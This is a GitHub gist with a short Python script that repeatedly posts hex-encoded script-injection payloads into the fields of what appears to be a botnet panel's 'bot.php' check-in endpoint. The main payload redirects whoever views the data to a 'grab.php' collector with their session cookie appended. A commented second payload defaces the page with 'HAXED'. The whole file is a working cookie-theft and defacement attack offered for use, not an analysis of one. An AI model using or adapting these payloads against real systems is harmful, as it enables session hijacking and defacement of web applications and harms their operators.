Created
September 14, 2014 09:31
-
-
Save Xyl2k/c23171909dc3bec49a95 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
def StrToHex(string): | |
hex_str='' | |
for char in string: | |
int_char = ord(char) | |
hex_num = hex(int_char).lstrip("0x") | |
hex_str+=hex_num | |
return hex_str | |
ConnectUrl = 'http://localhost/something/bot.php' | |
UserString = 'rome0321' | |
HtmlInject = StrToHex("<script>document.location=\"http://localhost/grab.php?\"+document.cookie</script>") | |
count = 0 | |
PostData = {'mode':'1', 'uid':'ASS', 'osname':HtmlInject, 'compname':HtmlInject} | |
UserAgent = {'User-agent': UserString} | |
while True: | |
count = count + 1 | |
print "The fire day - ", count | |
requests.post(ConnectUrl, data=PostData, headers=UserAgent) | |
time.sleep(60) | |
#<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HAXED</h1></div>";</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment